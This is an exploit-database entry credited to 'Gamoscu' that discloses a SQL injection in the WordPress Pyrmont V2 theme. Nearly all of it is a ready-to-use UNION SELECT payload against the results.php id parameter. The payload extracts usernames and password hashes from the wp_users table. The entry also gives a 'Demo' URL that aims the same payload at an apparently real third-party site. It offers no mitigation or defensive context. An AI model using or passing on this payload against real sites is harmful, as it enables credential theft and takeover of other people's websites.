WordPress and Pyrmont V2. SQL Injection Vulnerability

2009-12-18T00:00:00
ID 1337DAY-ID-10331
Type zdt
Reporter Gamoscu
Modified 2009-12-18T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =====================================================
WordPress and Pyrmont V2. SQL Injection Vulnerability
=====================================================

#############################################################
# WordPress and Pyrmont V2. SQL Injection Vulnerability
 
# Plugin Home: http://wordpress.org/extend/themes/pyrmont-v2
 
# Author: Gamoscu
 
# Site: www.1923turk.biz
 
#  Site: http://gamoscu.wordpress.com/
   
##############################################################
 
 
 
  
# Exploit:
http://server/path/results.php?id=-9999+union+select+1,concat_ws(0x3a,user_login,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+wp_users
     
           -9999+union+select+1,concat_ws(0x3a,user_login,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+wp_users
          
 
# Demo: http://cc.cc.moose.cc/maps/results.php?id=-9999+union+select+1,concat_ws(0x3a,user_login,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+wp_users
  
##############################################################



#  0day.today [2018-03-01]  #